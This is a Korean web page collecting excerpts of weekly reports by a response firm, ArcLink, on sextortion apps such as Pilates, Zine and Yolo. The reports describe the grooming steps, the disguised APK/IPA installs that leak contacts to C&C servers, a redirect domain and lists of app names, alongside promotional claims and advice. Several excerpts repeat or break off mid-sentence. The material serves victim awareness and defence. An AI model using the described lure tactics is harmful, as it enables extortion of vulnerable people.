같은 고도화된 앱에 대해 다음과 같은 절차를 수행하고 있습니다.디컴파일링: 악성 앱의 방어 구조를 해체하고 초대코드 우회유포 차단 솔루션: 확보된 접근 권한을 활용해 영상 유포를 원천적으로 차단아크링크는 24시간 실시간 대응으로 피해자의 빠른 일상 복귀를 돕고 있으며,기술력을 지속적으로 발전시켜 변화하는 디지털 범죄 수법에 적극적으로 대처하고 있습니다.디지털 범죄에 대한 전문적인 대응과 예방은 무엇보다 중요합니다.피해를 입었다면 24시 피해 상황 무료 진단을 통해신속한 대응을 하시길 바랍니다.
-
리포트
- [2월 1주차] Pilates 분석 보고서
- 악성 앱과 몸캠피싱의 실태 및 대응 방안몸캠 피싱은 단순히 채팅 앱을 이용한다고 해서 바로 피해를 입는 것은 아닙니다. 하지만 해킹에는 다양한 방법이 존재하기 때문에 채팅 중에도 피해를 볼 가능성이 있으의도치 않게 상대방이 보낸 악성 앱을 설치하여 해킹을 당할 수도 있습니다.그만큼 해킹 수법은 날로 발전하고 있으므로 낯선 사람과 소통할 때는 항상 주의하는 것이 중요합니다.Part 1. 몸캠피싱 가해 수법몸캠피싱의 수법가해자들은 주로 랜덤채팅이나 SNS의 다이렉트 메시지를 통해 접근하여 피해자와의 대화를 시작합니다. 이후 친밀감을 형성하며 신뢰를 얻는 동시에 교묘한 방식으로 악성 앱 설치를 유도합니다.이 과정에서 피해자는 자신도 모르게 가해자에게 기기의 민감한 권한을 허용하게 되고, 이를 통해 가해자는 피해자의 영상, 사진, 연락처 등의 민감한 데이터를 확보합니다. 이후 이 데이터를 빌미로 협박하는 것이 몸캠피싱의 대표적인 수법입니다.최근 몸캠피싱 범죄는 안드로이드와 iOS를 모두 타겟으로 삼고 있으며, 더욱 정교한 기술을 동원하고 있습니다.예를 들어:가짜 앱스토어(App Store) 화면을 구현하여 피해자가 진짜 애플리케이션을 설치했다고 착각하게 만듭니다.설치된 악성 앱은 피해자의 카메라, 마이크, 저장소 등 민감한 권한에 접근하여 데이터 탈취 및 실시간 감시를 가능하게 합니다.일부 악성 앱은 삭제를 방지하기 위해 시스템 깊숙이 숨거나 백그라운드에서 지속적으로 실행되는 기능을 포함합니다.Part 2. 최신 악성 앱 동향2025년 2월까지 아크링크에 접수된 몸캠피싱 관련 악성 앱 목록은 다음과 같습니다.팬더티비BJ, 홈요가, hpb dildo, 비밀공간C, 17LIVES, 필라테스 영상Photo locker, 텔레그램 앨범, 비밀톡, Whales, Aria Yoga, CherryZcloud, Hyeri Yoga, My Video, MZ세대, 울프(Wolf), 내쉼터, 비밀영상비밀앨범, Sfile, Yolo, 플러팅, bp dildo, Zine, Pilates✔️악성 앱의 작동 방식가해자는 피해자에게 피싱 링크를 통해APK(안드로이드) 또는 IPA(iOS) 파일 설치를 유도합니다.이 파일을 설치하게 되면 설치한 기기의개인정보와 연락처가 가해자의 C&C서버로 즉각 유출됩니다.Part 3. 신규 악성 앱: Pilates2025년 2월 첫째주,Pilates 관련 피해 사례는 5건이 접수되었으며,주요 수법은 다음과 같습니다.접근경로 : 소개팅 앱, 만남 어플, SNS 등을 통해 피해자에게 접근신뢰 구축 : 어플 내에서 호감도를 쌓은 후 대화가 불편하다는 이유로 개인 메신저로 대화 유도대화 유도 : 성적인 대화를 통해 영상통화를 제안하고 이를 녹화악성 앱 설치 요구 : URL을 보내주며 영상통화 녹화 방지 등의 이유로 앱 설치 요구영상 유포 협박 : 영상통화 녹화본 유포를 빌미로 금품 갈취Part 4. Pilates 특징다운로드를 진행하면 해당 파일은 "영상.apk"라는 이름으로 표시되며, 실행 가능한 애플리케이션(APK) 파일입니다.또한, 앱을 실행하면 필라테스와 관련된 운동 앱처럼 위장하여 사용자가 의심 없이 설치하도록 유도합니다. 하지만 이 앱은 단순한 운동 앱이 아니라 악성 코드가 숨겨진 해킹 앱일 가능성이 크므로, 출처가 불분명한 파일은 절대 설치하지 않는 것이 중요합니다.Part 5. Pilates 대응방안대응 시 유의점 : 공장 초기화 금지- 파일 삭제 시 증거가 소멸되어 해결이 어려워질 수 있습니다.전문가 지원: 가해자에게 협상 의사를 표시하며 시간을 벌고 전문가의 도움을 요청해야 합니다.악성 앱 분석과 데이터 복구, 유포 차단 솔루션을 지원 받습니다.Part 6. 아크링크의 전문 대응 솔루션아크링크는 매일 업데이트되는 악성 앱을 분석하여 이에 맞는 해결 방안을 제공합니다.특히, Pilates와 같은 고도화된 앱에 대해 다음과 같은 절차를 수행합니다.디컴파일링: 악성 앱의 방어 구조를 해체하고 초대코드 우회유포 차단 솔루션: 확보된 접근 권한을 활용해 영상 유포를 원천적으로 차단아크링크는 24시간 실시간 대응으로 피해자의 빠른 일상 복귀를 돕고 있으며,기술력을 지속적으로 발전시켜 변화하는 디지털 범죄 수법에 적극적으로 대처하고 있습니다.디지털 범죄에 대한 전문적인 대응과 예방은 무엇보다 중요합니다.피해를 입었다면 24시 피해 상황 무료 진단을 통해신속한 대응을 하시길 바랍니다.
-
리포트
- [1월 4주차] Zine 분석 보고서
- 악성 앱과 몸캠피싱의 실태 및 대응 방안몸캠피싱은 디지털 범죄의 대표적인 사례로, 특히 스마트폰 사용자를 대상으로 많은 피해가 발생하고 있습니다. 범죄자는 채팅을 통해 피해자와 친밀한 관계를 형성한 뒤, 악성 앱을 설치하도록 유도합니다. 이후, 해킹한 피해자의 연락처와 개인정보를 이용해 유포를 빌미로 협박하는 방식을 주로 사용합니다. 스마트폰 사용자는 누구나 이러한 위험에 노출될 수 있으므로 각별한 주의가 필요합니다.Part 1. 몸캠피싱 가해 수법몸캠피싱의 수법가해자들은 주로 랜덤채팅이나 SNS의 다이렉트 메시지를 통해 접근하여 피해자와의 대화를 시작합니다. 이후 친밀감을 형성하며 신뢰를 얻는 동시에 교묘한 방식으로 악성 앱 설치를 유도합니다.이 과정에서 피해자는 자신도 모르게 가해자에게 기기의 민감한 권한을 허용하게 되고, 이를 통해 가해자는 피해자의 영상, 사진, 연락처 등의 민감한 데이터를 확보합니다. 이후 이 데이터를 빌미로 협박하는 것이 몸캠피싱의 대표적인 수법입니다.최근 몸캠피싱 범죄는 안드로이드와 iOS를 모두 타겟으로 삼고 있으며, 더욱 정교한 기술을 동원하고 있습니다.예를 들어:가짜 앱스토어(App Store) 화면을 구현하여 피해자가 진짜 애플리케이션을 설치했다고 착각하게 만듭니다.설치된 악성 앱은 피해자의 카메라, 마이크, 저장소 등 민감한 권한에 접근하여 데이터 탈취 및 실시간 감시를 가능하게 합니다.일부 악성 앱은 삭제를 방지하기 위해 시스템 깊숙이 숨거나 백그라운드에서 지속적으로 실행되는 기능을 포함합니다.Part 2. 최신 악성 앱 동향2025년 1월까지 아크링크에 접수된 몸캠피싱 관련 악성 앱 목록은 다음과 같습니다.팬더티비BJ, 홈요가, hpb dildo, 비밀공간C, 17LIVES, 필라테스 영상Photo locker, 텔레그램 앨범, 비밀톡, Whales, Aria Yoga, CherryZcloud, Hyeri Yoga, My Video, MZ세대, 울프(Wolf), 내쉼터, 비밀영상비밀앨범, Sfile, Yolo, 플러팅, bp dildo, Zine✔️악성 앱의 작동 방식가해자는 피해자에게 피싱 링크를 통해APK(안드로이드) 또는 IPA(iOS) 파일 설치를 유도합니다.이 파일을 설치하게 되면 설치한 기기의개인정보와 연락처가 가해자의 C&C서버로 즉각 유출됩니다.Part 3. 신규 악성 앱: Zine2025년 1월, Zine 관련 피해 사례는 6건이 접수되었으며,주요 수법은 다음과 같습니다.접근경로 : 소개팅 앱, 만남 어플, SNS 등을 통해 피해자에게 접근신뢰 구축 : 어플 내에서 호감도를 쌓은 후 대화가 불편하다는 이유로 개인 메신저로 대화 유도대화 유도 : 성적인 대화를 통해 영상통화를 제안하고 이를 녹화악성 앱 설치 요구 : URL을 보내주며 영상통화 녹화 방지 등의 이유로 앱 설치 요구영상 유포 협박 : 영상통화 녹화본 유포를 빌미로 금품 갈취Part 4. Zine 특징해당 URL에 접속하면 일반 랜덤 통화 앱을 다운로드할 수 있는 것처럼 보인다. 다운로드 버튼을 클릭하고 초대코드를 입력하는 순간, 해킹 프로그램이 실행되도록 설계되어 있습니다.사이트는 zine으로 나와있지만 앱을 설치하게 되면 since로 표기되는 특징이 있습니다.과거에는 주로 안드로이드 사용자를 대상으로 했지만, 최근에는 iOS 사용자까지 타겟으로 하는 앱이 등장하면서 더욱 주의가 필요합니다.Part 5. Zine 대응방안대응 시 유의점 : 공장 초기화 금지 - 파일 삭제 시 증거가 소멸되어 해결이 어려워질 수 있습니다.전문가 지원 : 가해자에게 협상 의사를 표시하며 시간을 벌고 전문가의 도움을 요청해야 합니다.악성 앱 분석과 데이터 복구, 유포 차단 솔루션을 지원 받습니다.Part 6. 아크링크의 전문 대응 솔루션아크링크는 매일 업데이트되는 악성 앱을 분석하여 이에 맞는 해결 방안을 제공합니다.특히, bp dildo와 같은 고도화된 앱에 대해 다음과 같은 절차를 수행합니다.디컴파일링: 악성 앱의 방어 구조를 해체하고 초대코드 우회유포 차단 솔루션: 확보된 접근 권한을 활용해 영상 유포를 원천적으로 차단아크링크는 24시간 실시간 대응으로 피해자의 빠른 일상 복귀를 돕고 있으며,기술력을 지속적으로 발전시켜 변화하는 디지털 범죄 수법에 적극적으로 대처하고 있습니다.디지털 범죄에 대한 전문적인 대응과 예방은 무엇보다 중요합니다.피해를 입었다면 24시 피해 상황 무료 진단을 통해신속한 대응을 하시길 바랍니다.
-
리포트
- [12월 2주차] bp dildo 분석 보고서
- 디지털 기술의 발전과 함께 다양한 형태의 범죄가 등장하는 가운데, 몸캠피싱은 지난 10여 년간 지속적으로 진화하며 많은 피해자를 양산하고 있습니다. 몸캠피싱의 수법이후 친밀감을 형성하며 신뢰를 얻는 동시에 교묘한 방식으로 악성 앱 설치를 유도합니다.이 과정에서 피해자는 자신도 모르게 가해자에게 기기의 민감한 권한을 허용하게 되고, 이후 이 데이터를 빌미로 협박하는 것이 몸캠피싱의 대표적인 수법입니다.최근 몸캠피싱 범죄는 안드로이드와 iOS를 모두 타겟으로 삼고 있으며, 더욱 정교한 기술을 동원하고 있습니다.예를 들어:2024년 11월부터 12월까지 아크링크에 접수된 몸캠피싱 관련 악성 앱 목록은 다음과 같습니다.가해자는 피해자에게 피싱 링크를 통해이 파일을 설치하게 되면 설치한 기기의2024년 12월, bp dildo 관련 피해 사례는 3건이 접수되었으며,접근 경로: 소개팅 앱, 만남 어플, SNS 등을 통해 피해자에게 접근신뢰 구축: 어플 내 대화가 불편하다는 이유로 개인 메신저로 대화 유도성적인 대화로 유도: 민감한 대화를 통해 영상통화를 제안하고 이를 녹화악성 앱 설치 요구: 영상통화 녹화 방지 등의 이유로 악성 앱 설치를 요구하며 데이터를 확보영상 유포 협박 : 영상통화 녹화본 유포를 빌미로 금품 갈취Part 3. bp dildo 특징범죄에 사용합니다. 악성 앱의 경우, 피해자가 발생하면 대응 기업에서 해당 앱에 대한 정보를 꾸준히 노출시키기 때문입니다.가해자들은 자신의 성인 기구를 원격으로 조종할 수 있다는 이유로 해당 앱을 설치하게 하여 즉시 피해자의 개인정보를 탈취합니다.대응 시 유의점 : 공장 초기화 금지 - 파일 삭제 시 증거가 소멸되어 해결이 어려워질 수 있습니다.전문가 지원 : 가해자에게 협상 의사를 표시하며 시간을 벌고 전문가의 도움을 요청해야 합니다.악성 앱 분석과 데이터 복구, 유포 차단 솔루션을 지원 받습니다.Part 5. 아크링크의 전문 대응 솔루션특히, bp dildo와 같은 고도화된 앱에 대해 다음과 같은 절차를 수행합니다.디컴파일링: 악성 앱의 방어 구조를 해체하고 초대코드 우회유포 차단 솔루션: 확보된 접근 권한을 활용해 영상 유포를 원천적으로 차단아크링크는 24시간 실시간 대응으로 피해자의 빠른 일상 복귀를 돕고 있으며,피해를 입었다면 24시 피해 상황 무료 진단을 통해 신속한
-
리포트
- [12월 1주차] 플러팅 분석 보고서
- Part 1. 최신 악성 앱 동향2024년 11월부터 12월까지 아크링크에 접수된 몸캠피싱 관련 악성 앱 목록은 다음과 같습니다.팬더티비BJ, 홈요가, hpb dildo, 비밀공간C, 17LIVES, 필라테스 영상Photo locker, 텔레그램 앨범, 비밀톡, Whales, Aria Yoga, CherryZcloud, Hyeri Yoga, My Video, MZ세대, 울프(Wolf), 내쉼터, 비밀영상비밀앨범, Sfile, Yolo, 플러팅Part 2. 신규 악성 앱: 플러팅2024년 12월, 플러팅 관련 피해 사례는 3건이 접수되었으며,주요 수법은 다음과 같습니다.접근 경로: 소개팅 앱, 만남 어플, SNS 등을 통해 피해자에게 접근신뢰 구축: 어플 내 대화가 불편하다는 이유로 개인 메신저로 대화 유도성적인 대화로 유도: 민감한 대화를 통해 영상통화를 제안하고 이를 녹화악성 앱 설치 요구: 영상통화 녹화 방지 등의 이유로 악성 앱 설치를 요구하며 데이터를 확보영상 유포 협박 : 영상통화 녹화본 유포를 빌미로 금품 갈취Part 4. 플러팅 대응 방안대응 시 유의점 : 공장 초기화 금지 - 파일 삭제 시 증거가 소멸되어 해결이 어려워질 수 있습니다.전문가 지원 : 가해자에게 협상 의사를 표시하며 시간을 벌고 전문가의 도움을 요청해야 합니다.악성 앱 분석과 데이터 복구, 유포 차단 솔루션을 지원 받습니다.
-
리포트
- [11월 5주차] 욜로(Yolo) 분석 보고서
- 최근 들어 해킹 기술과 악성 앱을 결합한 정교한 수법이 등장하면서 예상치 못한 피해 사례가 빈번히 보고되고 있습니다.교묘한 방법으로 악성 프로그램 설치를 유도하는 경우가 많습니다.악성 앱을 활용한 몸캠피싱은 안드로이드 및 iOS 기기를 모두 대상으로 하며,이로 인해 피해를 예방하고 효과적으로 대응하기 위해 체계적이고 전문적인 대처가 절실히 요구됩니다.Part 1. 최신 악성 앱 동향팬더티비BJ, 홈요가, hpb dildo, 비밀공간C, 17LIVES, 필라테스 영상Photo locker, 텔레그램 앨범, 비밀톡, Whales, Aria Yoga, CherryZcloud, Hyeri Yoga, My Video, MZ세대, 울프(Wolf), 내쉼터, 비밀영상비밀앨범, Sfile, Yolo, 갤러리✔️악성 앱의 작동 방식APK(안드로이드) 또는 IPA(iOS) 파일 설치를 유도합니다.개인정보와 연락처가 가해자의 C&C서버로 즉각 유출됩니다.Part 2. 신규 악성 앱: 욜로(Yolo)주요 수법은 다음과 같습니다.욜로(Yolo)는 특히 설치 화면이 실제 앱스토어와 유사하게 구성되어 피해자가 악성 앱임을 인지하지 못하도록 설계되었습니다.특히 해당 앱 설치 링크에 접속 시, 서버는 러브홈(m.homelove.19.com)으로 넘어가는 것으로 확인되어기존 러브홈에서 이름만 바꾼 악성 앱 임을 알 수 있습니다. Part 4. 욜로(Yolo) 대응 방안아크링크는 매일 업데이트되는 악성 앱을 분석하여 이에 맞는 해결 방안을 제공합니다.기술력을 지속적으로 발전시켜 변화하는 디지털 범죄 수법에 적극적으로 대처하고 있습니다.디지털 범죄에 대한 전문적인 대응과 예방은 무엇보다 중요합니다.대응을 하시길 바랍니다.
-
리포트
- [11월 4주차] 울프톡(Wolf) 분석 보고서
- 특히 최근에는 해킹 기술과 악성 앱을 결합한 고도화된 수법이 증가하며 예상치 못한 피해를 입는 사례가 급증하고 있습니다.교묘한 방식으로 악성 프로그램 설치를 유도합니다.악성 앱을 활용한 몸캠피싱은 안드로이드와 iOS 기기 모두를 대상으로 하며,이에 따라 피해 예방과 대응을 위한 체계적이고 전문적인 접근이 요구됩니다.Part 1. 최신 악성 앱 동향팬더티비BJ, 홈요가, hpb dildo, 비밀공간C, 17LIVES, 필라테스 영상Photo locker, 텔레그램 앨범, 비밀톡, Whales, Aria Yoga, CherryZcloud, Hyeri Yoga, My Video, MZ세대, 울프(Wolf), 내쉼터, 비밀영상비밀앨범, Sfile, Yolo✔️악성 앱의 작동 방식APK(안드로이드) 또는 IPA(iOS) 파일 설치를 유도합니다.개인정보와 연락처가 가해자의 C&C서버로 즉각 유출됩니다.Part 2. 신규 악성 앱: 울프톡(Wolf)주요 수법은 다음과 같습니다.울프톡은 특히 설치 화면이 실제 앱스토어와 유사하게 구성되어 피해자가 악성 앱임을 인지하지 못하도록 설계되었습니다.대응 시 유의점 : 공장 초기화 금지 - 파일 삭제 시 증거가 소멸되어 해결이 어려워질 수 있습니다.전문가 지원 : 가해자에게 협상 의사를 표시하며 시간을 벌고 전문가의 도움을 요청해야 합니다.악성 앱 분석과 데이터 복구, 유포 차단 솔루션을 지원 받습니다.Part 5. 아크링크의 전문 대응 솔루션특히, 울프톡(Wolf)과 같은 고도화된 앱에 대해 다음과 같은 절차를 수행합니다.디컴파일링: 악성 앱의 방어 구조를 해체하고 초대코드 우회유포 차단 솔루션: 확보된 접근 권한을 활용해 영상 유포를 원천적으로 차단아크링크는 24시간 실시간 대응으로 피해자의 빠른 일상 복귀를 돕고 있으며,피해를 입었다면 24시 피해 상황 무료 진단을 통해 신속한